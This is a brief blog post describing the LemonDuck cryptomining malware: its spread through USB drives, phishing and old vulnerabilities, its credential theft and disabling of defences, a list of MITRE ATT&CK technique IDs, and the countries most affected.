Picture credited to https://www.galleryhenoch.com/artists/41-samuel-hung/works/
LemonDuck was the dangerous cryptomining malware dated back in 2019 which shifted from a cryptomining botnet to a lethal piece of software that may steal credentials and disable security measures.
LemonDuck is distinct from other mining malware since it is susceptible to security updates. It propagates via a variety of vectors, including USB sticks, phishing emails, and outdated but still operative vulnerabilities. In addition, after infecting a machine, LemonDuck fixes the same vulnerability it exploited to obtain access.
LemonDuck exhibits a number of MITRE ATT&CK framework approaches such as:
- T1190 (Exploitation for Public-Facing Application)
- T1203 (Exploitation for Client Execution)
- T1089 (Disabling Security Tools)
- T1105 (Remote File Copy)
- T1505 (Server Software Component - SQL Stored Procedures)
- T1027 (Obfuscated Files or Information)
- T1086 (PowerShell)
- T1035 (Service Execution)
- T1021.002 (Remote Services: SMB/Windows Admin Shares)
- T1053 (Scheduled Task)
- T1562.004 (Impair Defenses: Disable or Modify System Firewall
- T1218.005 (Signed Binary Proxy Execution: Mshta Windows process)
LemonDuck dominates on the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam.
LemonDuck Indicator of Compromises (IOCs) can be found here .
Post a Comment
0Comments